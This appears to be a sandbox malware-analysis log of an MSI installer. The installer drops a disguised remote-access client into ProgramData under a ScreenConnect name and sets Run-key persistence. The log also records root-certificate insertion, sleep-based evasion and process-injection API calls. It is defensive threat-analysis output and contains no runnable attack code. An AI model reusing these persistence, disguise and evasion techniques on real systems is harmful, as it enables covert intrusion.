Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\vfcompat.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\ir41_qcx.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\Veeam.Backup.Model.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\dpnhupnp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\ir50_32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\getuname.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\msvcr100_clr0400.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\icmp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\WerEnc.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\dpnathlp.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\appverifUI.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\winrssrv.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\wfapigp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\client32.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\dxmasf.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\dpnlobby.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\winrsmgr.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\UIManagerBrokerps.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\pcicapi.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\wiatrace.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\vfcompat.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\ir41_qcx.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\PCICL32.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\PCICHEK.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\Veeam.Backup.Model.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\dpnhupnp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\ir50_32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\getuname.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\msvcr100_clr0400.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\icmp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\WerEnc.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\msvcr100.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\ProgramData\MScreenConnect\dpnathlp.dll	Jump to dropped file

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_6CC75690 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,

3_2_6CC75690

Source: C:\ProgramData\MScreenConnect\client32.exe

3_2_11119810

Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ScreenConnect			Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ScreenConnect			Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11129D80 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,	3_2_11129D80
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11023040 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	3_2_11023040
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110B7590 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	3_2_110B7590
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	3_2_11149BF0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	3_2_11149BF0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11105AE0 IsIconic,	3_2_11105AE0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	3_2_110C1C00
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	3_2_110C1C00
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11149FF0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	3_2_11149FF0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11024350 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	3_2_11024350
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11114780 IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	3_2_11114780
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110247A0 IsIconic,BringWindowToTop,GetCurrentThreadId,	3_2_110247A0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_111066E0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	3_2_111066E0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11022970 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	3_2_11022970
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11023040 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_11023040
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110B7590 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,	6_2_110B7590
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_11149BF0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11149BF0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,	6_2_11149BF0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11105AE0 IsIconic,	6_2_11105AE0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11129D80 IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,	6_2_11129D80
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110C1C00
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110C1C00 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,	6_2_110C1C00
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11149FF0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,	6_2_11149FF0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11024350 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,	6_2_11024350
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11114780 IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,	6_2_11114780
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110247A0 IsIconic,BringWindowToTop,GetCurrentThreadId,	6_2_110247A0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_111066E0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,	6_2_111066E0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11022970 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,	6_2_11022970

Source: C:\ProgramData\MScreenConnect\client32.exe

3_2_11081000

Source: C:\Windows\System32\msiexec.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D3DD483E2BBF4C05E8AF10F5FA7626CFD3DC3092 Blob

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110AECE0 Sleep,ExitProcess,		3_2_110AECE0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110AECE0 Sleep,ExitProcess,		6_2_110AECE0

Source: C:\ProgramData\MScreenConnect\client32.exe	Window / User API: threadDelayed 455	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Window / User API: threadDelayed 1339	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe	Window / User API: threadDelayed 6575	Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\appverifUI.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\HTCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\winrssrv.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\ir41_qcx.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\AudioCapture.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\wfapigp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\dpnhupnp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\Veeam.Backup.Model.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\dxmasf.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\ir50_32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\getuname.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\dpnlobby.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\TCCTL32.DLL	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\winrsmgr.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\UIManagerBrokerps.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\icmp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\msvcr100_clr0400.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\WerEnc.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\msvcp140_codecvt_ids.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\wiatrace.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\vfcompat.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\remcmdstub.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\ProgramData\MScreenConnect\dpnathlp.dll	Jump to dropped file

Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-73540
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-76768
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-76411
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-77169
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-77081
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-77495
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-77496
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-77575
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision	graph_3-77864
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision
Source: C:\ProgramData\MScreenConnect\client32.exe	Evaded block: after key decision

Source: C:\ProgramData\MScreenConnect\client32.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\ProgramData\MScreenConnect\client32.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_3-72086

Source: C:\ProgramData\MScreenConnect\client32.exe	API coverage: 6.7 %
Source: C:\ProgramData\MScreenConnect\client32.exe	API coverage: 2.9 %

Source: C:\ProgramData\MScreenConnect\client32.exe TID: 4748	Thread sleep time: -45500s >= -30000s	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe TID: 4796	Thread sleep time: -334750s >= -30000s	Jump to behavior
Source: C:\ProgramData\MScreenConnect\client32.exe TID: 4796	Thread sleep time: -1643750s >= -30000s	Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe

Last function: Thread delayed

Source: C:\ProgramData\MScreenConnect\client32.exe

Code function: 3_2_6CC71780 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6CC7186Fh

3_2_6CC71780

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	3_2_11061140
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,	3_2_11065870
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	3_2_110B3B00
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	3_2_1102BB50
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	3_2_111180C0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 3_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	3_2_110FE450
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102BB50
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11061140
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,	6_2_11065870
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,	6_2_110B3B00
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111180C0
Source: C:\ProgramData\MScreenConnect\client32.exe	Code function: 6_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_110FE450

Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: SVmWareStrings
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VmWareHosts
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VmWareRole
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VirtualMachineConfiguration
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: SVmWareApiVersionParser
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: IsAllAvailable%AvailableBusNumberCHostId: [{0}], TargetVmRef: [{1}];TargetVirtualMachineDiskInfos-IsQuickRollbackEnabled
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: vmc.vmware.com
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize VMware Cloud Director NAT rule changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <VirtualMachineName>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: virtualMachines!CloudMsgSettings
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: IsVMwareVc&IsVMwareVcSpecified
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: oibVirtualMachineName
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to de-serialize VMware Cloud Director firewall rule changes ('{0}').
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: DefaultVirtualMachine
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_VirtualMachineConfiguration
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: WMicrosoft:Hyper-V:Synthetic SCSI Controller
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: <InstalledVmTools>k__BackingField
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director vApp network.
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: get_VmWareRegularReplicaVMsCount
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: set_IsVMwareVc
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: SMicrosoft:Hyper-V:Emulated IDE Controller
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: _tgtHostVmNetworks
Source: Veeam.Backup.Model.dll.1.dr	Binary or memory string: Failed to serialize array of VMware Cloud Director firewall rule changes ('{0}').
